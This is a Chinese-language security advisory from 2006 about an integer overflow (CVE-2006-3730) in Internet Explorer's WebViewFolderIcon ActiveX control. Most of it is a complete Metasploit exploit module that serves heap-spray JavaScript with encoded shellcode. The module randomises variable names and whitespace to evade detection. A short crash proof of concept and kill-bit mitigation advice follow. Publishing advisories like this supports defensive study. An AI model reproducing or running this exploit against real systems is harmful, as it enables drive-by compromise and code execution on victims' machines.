中华网络安全联盟    来源：奇趣    时间：2006-9-28 12:20:46

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0

描述：

BUGTRAQ  ID: 19030
CVE(CAN) ID: CVE-2006-3730

Internet Explorer是微软发布的非常流行的WEB浏览器。

Internet Explorer在处理畸形的ActiveX对象调用方式时存在整数溢出漏洞，远程攻击者可能利用此漏洞导致浏览器崩溃或执行任意指令。

如果攻击者能够向WebViewFolderIcon控件的setSlice方法传送0x7fffffff参数的话，可能导致浏览器崩溃或执行任意指令。

<*来源：H D Moore （hdm@metasploit.com）
  
  链接：http://browserfun.blogspot.com/
        http://www.kb.cert.org/vuls/id/753044
        http://www.us-cert.gov/cas/techalerts/TA06-270A.html
*>

测试方法：

require 'msf/core'

module Msf

class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote

    include Exploit::Remote::HttpServer::Html

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
            'Description'    => %q{
                This module exploits a flaw in the WebViewFolderIcon ActiveX control
            included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
            during the Month of Browser Bugs project (MoBB #18).
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'hdm',
                ],
            'Version'        => '$Revision: 3783 $',
            'References'     =>
                [
                    [ 'OSVDB', '27110' ],
                    [ 'BID', '19030' ],
                    [ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
                ],
            'Payload'        =>
                {
                    'Space'          => 1024,
                    'BadChars'       => "\x00",
    
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    ['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
                ],
            'DefaultTarget'  => 0))
    end

    def autofilter
        false
    end
    
    def on_request_uri(cli, request)

        # Re-generate the payload
        return if ((p = regenerate_payload(cli)) == nil)

        # Encode the shellcode
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
        
        # Get a unicode friendly version of the return address
        addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]

        # Randomize the javascript variable names    
        var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
        var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
        var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
        var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
        var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
        var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
        var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)
        
        # Randomize HTML data
        html          = Rex::Text.rand_text_alpha(rand(30)+2)
        
        # Build out the message
        content = %Q|
<html>
<head>
    <script>
    try {
    
    var #{var_unescape}  = unescape ;
    var #{var_shellcode} = #{var_unescape}( "#{shellcode}" ) ;
    
    var #{var_buffer} = #{var_unescape}( "%u#{addr_word}" ) ;
    while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;

    var #{var_x} = new Array() ;    
    for ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {
        #{var_x}[ #{var_i} ] =
            #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
            #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +
            #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +         
            #{var_buffer}.substring( 0 ,  0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;
    }
    
    
       for ( var #{var_i} = 0 ; #{var_i} < 1024 ; #{var_i}++) {
        var #{var_tic} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );    
        try { #{var_tic}.setSlice( 0x7ffffffe , 0 , 0 , #{target.ret} ) ; } catch( e ) { }
        var #{var_toc} = new ActiveXObject( 'WebViewFolderIcon.WebViewFolderIcon.1' );
    }
    
    } catch( e ) { window.location = 'about:blank' ; }
    
    </script>
</head>
<body>
#{html}
</body>
</html>        
        |

        # Randomize the whitespace in the document
        content.gsub!(/\s+/) do |s|
            len = rand(100)+2
            set = "\x09\x20\x0d\x0a"
            buf = ''
            
            while (buf.length < len)
                buf << set[rand(set.length)].chr
            end
            
            buf
        end
        
        print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

        # Transmit the response to the client
        send_response(cli, content)
    end

end

end


＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);

建议：

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 禁用WebViewFolderIcon ActiveX控件

为以下CLSID设置kill bit来禁用WebViewFolderIcon控件：

       {844F4806-E8A8-11d2-9652-00C04FC30871}

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/windows/ie/default.asp